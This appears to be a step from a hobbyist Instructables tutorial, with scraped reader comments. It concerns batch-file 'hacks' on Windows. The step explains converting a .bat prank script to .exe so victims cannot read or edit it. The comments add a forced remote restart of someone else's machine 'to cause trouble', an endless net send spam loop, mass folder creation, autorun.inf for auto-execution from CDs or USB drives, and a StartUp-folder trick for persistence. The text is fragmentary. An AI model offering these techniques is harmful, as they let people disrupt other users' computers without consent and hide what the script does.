Step 4BAT2EXE: Hiding your Haxing
Sure, you could name the .bat to something like "Anti-Shutdown.bat" or something, but you can still read it, and edit it by Right-Clicking and selecting "Edit"
The safest way is to make your .bat into a .exe!
Yes! Perfect! That'll keep it hidden!
But how do you do that?
You use a Bat to Exe converter from F2ko.de.
It's a pretty neat website, actually, because they have an Online batch converter as well, in case you're paranoid about downloading files from the internets.
I've uploaded the file to Instructables for your convenience, but you can simply download the original from F2ko.de, or even use their online version.
That's it for this edition!
~Seeya!~
| « Previous Step | Download PDFView All Steps | Next Step » |










































for /l %%n in (1,1,____) do md %%n (inset a number for the ___)
it will make however many empty folders as you specify in the location that th file is in. my question is how does it work? "what does it mean?!"
*ahem* sorry. reference to double rainbow song..
does:
shuts down the computer computername
Of course, one still needs to specify -s [shutdown], -r [restart], or -a [abort] to actually do something. (-L [logoff] doesn't work with -m]
So, if you wanted to cause trouble with the person using computer bedroom, then the command would be:
shutdown -r -m \\bedroom -f -t 0
:1
netsend * you got haxed!!!!!!!!!!!!!!!!!!11111
goto 1
If you want it to autorun off of a CD, you make it into a .exe file using the method I mentioned in Step 4. You put the .exe file in your CD, or USB drive, and create a text file in the root of the device with the name "autorun.inf." In the file, simply type:
[autorun]
open=(Path of Batchfile, ex: \batchexe\batch.exe or batch.exe)
If you want to autorun it whenever you start up your computer, simply go to your Start menu, find a folder called "StartUp" and right click it, and select 'Explore.' Then drop the .bat or .exe file in the folder.
is how it should look